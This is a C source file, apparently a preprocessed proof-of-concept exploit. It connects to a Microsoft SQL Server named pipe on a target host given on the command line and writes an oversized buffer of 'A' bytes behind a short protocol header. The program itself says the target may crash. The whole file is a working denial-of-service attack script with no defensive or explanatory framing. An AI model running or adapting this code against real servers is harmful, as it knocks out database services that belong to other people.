
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ HANDLE ;
typedef int DWORD ;
typedef scalar_t__ BOOL ;


 scalar_t__ CreateFile (char*,int,int ,int *,int ,int ,int *) ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 int GetLastError () ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int OPEN_EXISTING ;
 int PIPE_READMODE_MESSAGE ;
 scalar_t__ SetNamedPipeHandleState (scalar_t__,int *,int *,int *) ;
 int Usage () ;
 scalar_t__ WriteFile (scalar_t__,char*,unsigned long,int *,int *) ;
 unsigned long atol (char*) ;
 scalar_t__ malloc (unsigned long) ;
 int memset (char*,char,unsigned long) ;
 int printf (char*,...) ;
 int sprintf (char*,char*,char*) ;
 int strlen (char*) ;

int main(int argc, char* argv[])
{
 char lpPipeName[50];
 char *lpBuffer = ((void*)0);
 unsigned long ulSize = 0;

 BOOL bResult;
 DWORD dwWritten = 0, dwMode;
 HANDLE hPipe;

 Usage();

 printf("Starting...\n");

 if (argc != 3)
  goto Exit0;

 if (strlen(argv[1]) < 20)
 {
  sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
 }
 else
 {
  printf("Error!server\n");
  goto Exit0;
 }

 ulSize= atol(argv[2]);

 lpBuffer = (char*)malloc(ulSize + 2);
 if (((void*)0) == lpBuffer)
 {
  printf("malloc error!\n");
  goto Exit0;
 }

 memset(lpBuffer, 0, ulSize + 2);
 memset(lpBuffer, 'A', ulSize);
 *lpBuffer = '\x12';
 *(lpBuffer + 1) = '\x01';
 *(lpBuffer + 2) = '\x00';

 printf("Connecting Server...\n");

 hPipe = CreateFile(lpPipeName,
     GENERIC_READ | GENERIC_WRITE,
     0,
     ((void*)0),
     OPEN_EXISTING,
     0,
     ((void*)0));
 if (INVALID_HANDLE_VALUE == hPipe)
 {
  printf("Error!Connect server!%d\n", GetLastError());
  goto Exit0;
 }

 dwMode = PIPE_READMODE_MESSAGE;
 bResult = SetNamedPipeHandleState(
  hPipe,
  &dwMode,
  ((void*)0),
  ((void*)0));
 if (!bResult)
 {
  printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
  goto Exit0;
 }

 bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, ((void*)0));

 if (!bResult)
 {
  printf("\n\tError!WriteFile.%d\n\n", GetLastError());
  printf("When see the error message, the target may be crashed!!\n\n");
  goto Exit0;
 }

Exit0:

 return 0;
}
